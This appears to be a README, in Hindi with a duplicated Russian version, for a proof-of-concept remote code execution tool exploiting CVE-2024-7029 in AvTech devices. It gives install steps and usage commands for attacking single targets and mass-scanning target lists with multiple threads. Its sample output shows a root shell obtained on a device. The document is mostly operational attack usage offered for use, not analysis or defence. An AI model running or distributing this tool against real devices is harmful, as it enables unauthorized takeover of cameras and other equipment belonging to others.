
AvTech उपकरणों में पाए गए CVE-2024-7029 भेद्यता के लिए एक PoC शोषण, जो रिमोट कोड निष्पादन (RCE) की अनुमति देता है।
GenAvTechRCEExploit CVE-2024-7029 में पाई गई AvTech उपकरणों की कमज़ोरी के लिए एक PoC शोषण, जो रिमोट कोड निष्पादन (RCE) की अनुमति देता है। यह उपकरण कमज़ोर उपकरणों को स्कैन कर सकता है और उन पर इंटरैक्टिव रूप से कमांड निष्पादित कर सकता है।
requests लाइब्रेरीprompt_toolkit लाइब्रेरीalive_progress लाइब्रेरीआवश्यक लाइब्रेरीज़ को इस प्रकार स्थापित करें:
pip install -r requirements.txt
एकल लक्ष्य की कमज़ोरी की जाँच करने और इंटरैक्टिव शेल शुरू करने के लिए:
python3 GenAvTechRCEExploit.py -u <target_url>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки
<target_url> को लक्ष्य उपकरण के वास्तविक URL से बदलें।
एक फ़ाइल में प्रदान किए गए एकाधिक लक्ष्यों (प्रति पंक्ति एक URL) को स्कैन करने के लिए:
python3 GenAvTechRCEExploit.py -f <file_path>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима
<file_path> को उस फ़ाइल के पथ से बदलें जिसमें लक्ष्य URL हों।
आप -t विकल्प के साथ स्कैनिंग के लिए थ्रेड्स की संख्या निर्दिष्ट कर सकते हैं:
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>
डिफ़ॉल्ट रूप से, थ्रेड्स की संख्या 10 पर सेट है।
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20
GenAvTechRCEExploit - эксплоит для CVE-2024-7029 в устройствах AvTech, позволяющая удаленное выполнение кода (RCE). Этот инструмент может сканировать уязвимые устройства и выполнять на них команды в интерактивном режиме.
requestsprompt_toolkitalive_progressУстановить необходимые библиотеки можно с помощью:
pip install -r requirements.txt
Для проверки уязвимости одной цели и запуска интерактивной оболочки:
python3 GenAvTechRCEExploit.py -u <target_url>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки
Замените <target_url> на реальный URL целевого устройства.
Для сканирования нескольких целей, указанных в файле (один URL на строку):
python3 GenAvTechRCEExploit.py -f <file_path>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима
Замените <file_path> на путь к файлу, содержащему URL-адреса целей.
Вы можете указать количество потоков для сканирования с помощью опции -t:
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>
По умолчанию количество потоков установлено на 10.
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20